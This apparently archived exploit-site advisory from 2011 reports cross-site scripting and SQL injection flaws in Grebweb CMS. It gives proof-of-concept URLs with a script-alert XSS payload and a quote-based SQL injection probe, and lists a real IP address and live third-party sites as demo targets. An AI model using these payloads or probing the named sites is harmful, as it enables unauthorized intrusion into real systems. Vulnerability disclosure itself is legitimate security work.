Grebweb CMS Cross Site Scripting / SQL Injection

Grebweb CMS Cross Site Scripting / SQL Injection: Posted Dec 31, 2011; Authored by Net.Edit0r, BHG Security Center; Grebweb CMS suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; MD5 | ad56ac0282590a2cb0bd86102d8dca16; Download | Favorite | Comments (0)

Grebweb CMS Cross Site Scripting / SQL Injection

__________.__                 __               ___ ___
\______   \  | _____    ____ |  | __          /   |   \  ____
 |    |  _/  | \__  \ _/ ___\|  |/ /  ______ /    ~    \/ ___\
 |    |   \  |__/ __ \\  \___|    <  /_____/ \    Y    / /_/  >
 |______  /____(____  /\___  >__|_ \          \___|_  /\___  /
        \/          \/     \/     \/                \//_____/
                                                               .ORG
----------------------------------------------------------------
Grebweb Cms <= Multiple Disclosure Vulnerabilities
----------------------------------------------------------------

# Exploit Title: Grebweb Cms <= Multiple Disclosure Vulnerabilities
# Application Name: [Grebweb Cms]
# Date: 30/12/2011
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.grebweb.com/ ]
# Impact : [ High ]
# Tested on: [linux+apache]
# CVE : Webapps
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)

# Description: : Given the vulnerability you want to read files on the
server must have access

+-----------------------+
| Cross Site scripting  |
+-----------------------+

The vulnerable code is located in /admin/index.php?err=[XSS]


Proof of Concept:
-----------------


~ PoC : http://localhost/admin/index.php?err=[XSS]

  ~ Demo : http://202.71.128.172/NIHFW/admin/index.php?err="><script>alert(0)</script>

~ PoC 2

 Enter In Search Box XSS Code ~

 <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post">

~ PoC : http://localhost/index.php

 ~ Demo : http://www.yagyashree.com/index.php


+-------------------+
| Sql Injection     |
+-------------------+

~ Poc 2

 Enter In Search Box XSS Code ~

 <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post">

~ PoC : http://localhost/index.php

~ PoC : http://localhost/NIHFW/view-state.php?id=[Sqli]

  ~ Demo : http://202.71.128.172/NIHFW/view-state.php?id='


[-] Disclosure timeline:

[21/12/2011] - Vulnerabilities discovered
[24/12/2011] - Others vulnerabilities discovered
[27/12/2011] - Issues reported to http://black-hg.org
[30/12/2011] - Public disclosure


# Greets To :

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ tHe.k!ll3r ~ Mr.XHat ~ Bl4ck.Viper

b3hz4d ~ G3n3Rall ~ NoL1m1t ~ __SENATOR__ ~ NetQurd ~ Cyber C0der

THANKS TO ALL Iranian HackerZ  ./Persian Gulf

===========================================[End]=============================================

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
HauntIT 22 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

Grebweb CMS Cross Site Scripting / SQL Injection

Grebweb CMS Cross Site Scripting / SQL Injection

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Grebweb CMS Cross Site Scripting / SQL Injection

Share This

Grebweb CMS Cross Site Scripting / SQL Injection

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems